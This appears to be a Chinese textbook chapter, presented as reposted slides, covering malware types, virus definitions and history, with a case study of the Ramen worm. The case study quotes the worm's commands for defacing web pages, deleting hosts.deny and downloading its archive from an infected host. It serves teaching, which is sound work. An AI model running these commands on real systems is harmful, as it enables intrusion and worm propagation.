《《病毒与数据安全》ppt课件》由会员分享,可在线阅读,更多相关《《病毒与数据安全》ppt课件(160页珍藏版)》请在金锄头文库上搜索。
1、第14章 病毒与数据安全,14.1 恶意代码 14.2 计算机病毒的概念 14.3 病毒的起源 14.4 病毒的危害 14.5 病毒的传播方式 14.6 病毒的特点 14.7 病毒的分类,14.8 病毒的一般结构 14.9 病毒的工作原理 14.10 宏病毒的工作原理 14.11 CIH病毒的工作原理 14.12 网络病毒的工作原理 14.13 杀毒技术 习 题,14.1 恶 意 代 码,图14-1给出了所有软件威胁的分类情况,也就是恶意代码的分类情况。这些威胁可以分成两类:需要宿主的程序和可以独立运行的程序。前者实际上是程序片段,它们不能脱离某些特定的应用程序、应用工具或系统程序而独立存在;
2、后者是完整的程序,操作系统可以调度和运行它们。,图14-1 恶意代码分类,也可以把这些软件威胁按照能不能够自我复制来进行分类。不能够自我复制的可能是程序片段,当调用宿主程序完成特定功能时,就会激活它们。可以自我复制的程序可能是程序片段(病毒),也可能是一个独立的程序(蠕虫、细菌)。当执行它们时,将会复制出一个或多个自身的副本。以后这些副本可以在同一个系统中或其它系统中被激活。 值得注意的是,随着恶意代码编写技术的提升,各种代码之间都在取长补短,所以有些恶意代码可能包含其它的恶意代码。例如逻辑炸弹或特洛伊木马可能是病毒或者蠕虫的一部分。,1后门(Backdoor/ Trapdoor, 陷阱门)
3、后门是进入程序的一个秘密入口。知道这个后门的人就可以通过它绕过访问控制的一般安全检查,而直接获得访问权限。很多年来,程序员为了调试和测试程序一直合法地使用后门。当这些后门被用来获得非授权访问时,后门就变成了一种安全威胁。 2. 逻辑炸弹(Logic Bomb) 合法程序中的代码,当符合某种条件的时候就会“爆炸”。用来触发逻辑炸弹的条件可以是某些文件的出现或缺失、某个日期或星期几、某一特定用户运行该应用程序等。,3. 特洛伊木马(Trojan Horse) 特洛伊木马程序是一个有用的(或表面看起来很有用的)程序或命令过程,其中包含了秘密代码。当调用的时候,这些秘密代码将执行一些不必要的或有害的操
4、作。 当未授权用户无法直接完成某些操作的时候,就可以通过特洛伊木马程序来间接完成。比如在一个多用户操作系统中,如果想访问其它用户的文件,那么用户就可以创建一个特洛伊木马程序。当执行它的时候,将改变用户文件的访问权限,这样,任何用户都能读取它。,接着攻击者为了诱使用户运行该程序,就会把它放在公共目录里,并给它取一个听起来好像是一个很有用的程序的名字。当另一个用户运行该程序后,攻击者就能够访问该用户的文件信息了。很难被检测到的一种特洛伊木马程序就是编译器。通过修改正常的编译器,就可以在编译某些程序的时候插入附加代码,比如系统登录程序。该代码在登录程序中留下后门,这样攻击者就可以使用特殊的口令登录到
5、系统中。,4. 病毒(Virus) 病毒是能够通过修改其它程序而“感染”它们的一种程序。修改以后的程序里面包含了病毒程序的一个副本,这样它们就能够继续感染其它程序。 5蠕虫(Worm) 网络蠕虫通过网络连接从一个系统向另一个系统传播。一旦在一个系统中激活,网络蠕虫就能够像计算机病毒或细菌一样活动。它也能植入特洛伊木马程序或执行一些破坏性动作。,在复制自身的时候,网络蠕虫会使用一些网络工具。这包括: 电子邮件功能:蠕虫会把自身的副本邮寄到其它系统 中去。 远程执行能力:蠕虫能够运行其它系统中的副本。 远程登录能力:蠕虫能够像用户一样登录到远程系统中,然后使用系统命令从一个系统向另一个系统复制自身
6、。,这样,蠕虫程序的一个新的副本就在远程系统中运行了。 网络蠕虫和计算机病毒有很多相似之处,包括休眠期、传播期、触发期和执行期等。 下面我们通过一个蠕虫的例子来对蠕虫做以更深入的了解。 Ramen是一个利用RedHat现有远程漏洞自动传播的蠕虫。此蠕虫由多个攻击性缺陷(Exploit)和自动执行脚本组成,专门针对存在rpc.statd远程溢出、wu-ftpd、lpd格式化字符串漏洞的RedHat 6.2和RedHat 7.0系统进行入侵。,此蠕虫中包含以下文件: asp:一个RedHat7下面的xinetd配置文件,监听端口27374。 asp62:一个简单的httpd服务守护进程。当连接此服
7、务时,它会提供此蠕虫的压缩包,此蠕虫主要靠此服务传播(RedHat 6.2)。 asp7:一个简单的httpd服务守护进程。当连接此服务时,它会提供此蠕虫的压缩包,此蠕虫主要靠此服务传播(RedHat 7.0)。 bd62.sh:蠕虫的安装程序(RedHat 6.2)。,bd7.sh:蠕虫的安装程序(RedHat 7.0)。 getip.sh:获得主机IP的脚本。 hackl.sh:读取.l文件,并且把地址写入lh.sh。 hackw.sh:读取.w文件,并且把地址写入wh.sh。 index.html:HTML 文件。蠕虫用此文件替换主机的首页。 l62:修改过的LPRng 的格式化字符串攻
8、击程序(RedHat 6.2)。,l7:修改过的LPRng 的格式化字符串攻击程序(RedHat 7.0)。 lh.sh:执行LPRng exploit的脚本。 randb62:随机产生一个B类的IP地址(RedHat 6.2)。 randb7:随机产生一个B类的IP地址(RedHat 7.0)。 s62:修改过的statdx的漏洞(RedHat 6.2)。 s7:修改过的statdx的漏洞(RedHat 7.0)。,scan.sh:从randb程序中取得一个B类的网络地址,然后运行synscan。 start.sh:此蠕虫的开始程序。 start62.sh:后台开始运行 scan.sh, h
9、ackl.sh, hackw.sh脚本。 start7.sh:和start62.sh功能相同。 synscan62:修改过的synscan (RedHat 6.2)。 synscan7:修改过的synscan(RedHat 7.0)。 w62:修改过的wu-ftpd 2.6的漏洞 (RedHat 6.2)。 w7:修改过的wu-ftpd 2.6的漏洞 (RedHat 7.0)。 wh.sh:运行exploit的脚本。 wu62:修改过的wu-ftp 2.6的exploit。,它的感染过程如下: 入侵者先攻击进入一台RedHat 6.2或者RedHat 7.0,上传此蠕虫,运行start.sh脚
10、本,感染第一台RedHat: (1) start.sh查找主机的Web主页面,并且用自己的页面替换它: nohup find / -name “index.html“ -exec /bin/cp index.html ; & (2) 删除hosts.deny文件: rm -f /etc/hosts.deny,(3) 运行getip.sh,取这台主机的IP地址。 最后,简单判断此系统是RedHat 6.2还是RedHat 7.0后,安装相应的服务文件,开始工作。Ramen Worm扫描随机产生的地址范围,根据取回的FTP标志和端口信息来判断RedHat系统,进行相应的入侵。,当Ramen进入另外
11、一个系统后,会在系统上做如下动作: (1) 在/usr/src/ 建立隐藏目录 .poop/mkdir /usr/src/.poop;cd /usr/src/.poop。 (2) 通过lynx这个文本浏览器来取得已经中了Ramen的机器上的蠕虫文件: lynx -source http:/%s:27374 /usr/src/.poop/ramen.tgz 解开此压缩包,并且复制一份到/tmp目录下。 (3) 运行start.sh 感染系统,并且发一份E-mail到和gb31337 . 通知此蠕虫的主人。,6. 细菌(Bacteria) 细菌是那些不会直接损坏文件的程序,它们的惟一目的就是复制自
12、己。细菌以指数的形式增长,最终会占用全部的处理器、内存或磁盘空间,从而使用户无法访问这些资源。,14.2 计算机病毒的概念,计算机病毒是一种特殊的计算机程序,由于计算机病毒具有与生物学病毒相类似的特征(潜伏性、传染性、发作期等),所以人们就用生物学上的病毒来称呼它。,1994年2月28日,我国出台的中华人民共和国计算机安全保护条例对病毒的定义如下:“计算机病毒是指编制、或者在计算机程序中插入的,破坏数据、影响计算机使用,并能自我复制的一组计算机指令或者程序代码。”这只是计算机病毒的狭义定义,就广义而言,计算机病毒是指凡驻留于计算机内部(指掌握着系统的控制权),对系统原有功能进行非正确或用户未预
13、计修改的程序。常见的广义上的计算机病毒有逻辑炸弹、特洛伊木马等。,计算机病毒程序比较小,一般不会超过5 KB。与计算机其它合法程序一样,可以存储,可以执行,但是它没有文件名,不能在磁盘中以文件的形式独立存在。表14-1是病毒程序与正常程序的比较。,表14-1 病毒程序与正常程序的比较,计算机病毒寄生于磁盘、光盘等存储介质当中。这时它是静态的,不会感染,也不会起破坏作用。当用寄生了病毒的磁盘启动计算机时,或者执行染毒程序时,病毒就会随着合法程序的运行进入计算机内存,这时病毒进入活跃状态,随时可以进行感染和破坏,这个过程被称为病毒激活。 病毒被激活后,随时可能进行感染和破坏。不同的病毒有不同的感染
14、目标,病毒的破坏行为也是不同的。 虽然现在对计算机病毒的定义存在着差异,但都肯定这样的一个事实,即:计算机病毒是一种特殊的程序。,14.3 病 毒 的 起 源,“计算机病毒”一词首次出现在1977年由美国的Thomas J.Ryan出版的一本科幻小说The Adolescence of P-1中。在这部小说中作者幻想出世界上第一个计算机病毒,它可以从一台计算机传播到另一台计算机,最终控制7000多台计算机的操作系统,造成了一场大灾难。,10年后,计算机病毒由幻想变成现实,并广为传播。 一般认为,计算机病毒的发源地在美国。早在20世纪60年代初期,美国电报电话公司贝尔研究所里的一群年轻研究人员常
15、常做完工作后留在实验室里饶有兴趣的玩一种他们自己创造的计算机游戏,这种被称为“达尔文”的游戏很刺激。它的玩法是,每个人编一段小程序,输入到计算机中运行,互相展开攻击并设法毁灭他人的程序。这种程序就是计算机病毒的雏形,然而当时人们并没有意识到这一点。,也有人认为,计算机病毒来源于爱好者的表现欲。这些 人编制计算机病毒的目的不是为了破坏,而是为了显示他们渊博的计算机知识和高超的编程技巧。 又有一些人认为,计算机病毒来源于软件的加密技术。软件产品是一种知识密集的高科技产品,软件产品的研制耗资巨大,而且生产效率很低,但复制软件却异常的简单。由于各种原因,社会未能给软件产品提供有力的保护,大量存在非法拷
16、贝和非法使用的情况,严重地损坏了软件产业的利益。,为了保护软件产品,防止非法复制和非法使用,软件产业发展了软件加密技术,使软件产品只能使用,不能复制。早期的加密技术只是为了自卫,可以使程序锁死,使非法用户无法使用,或者使磁盘“自杀”,防止非法用户重复破译。后来随着加密与破译技术的激烈对抗,软件加密从自卫性转化为攻击性,于是产生了计算机病毒。 还有人认为,计算机病毒来源于感情的寄托。有些病毒信息具有明显的感情色彩,表明病毒制造者借用病毒发泄心中郁愤,这种病毒的发作显示信息往往直书心意。,计算机界真正认识到计算机病毒的存在是在1983年。在这一年11月3日召开的计算机安全学术讨论会上,美国计算机安全专家科恩(Frederick Cohen)博士首次提出了计算机病毒的概念,随后获准进行实验演示。由此证实了计算机病毒的存在,并证明计算机病毒可以在短时间内实现对计算机系统的破坏,且可以迅速地向外传播。,14.4 病 毒 的 危 害,计算机病毒都有感染性,它能广泛传播,但这并不可怕,可怕的是病毒的破坏
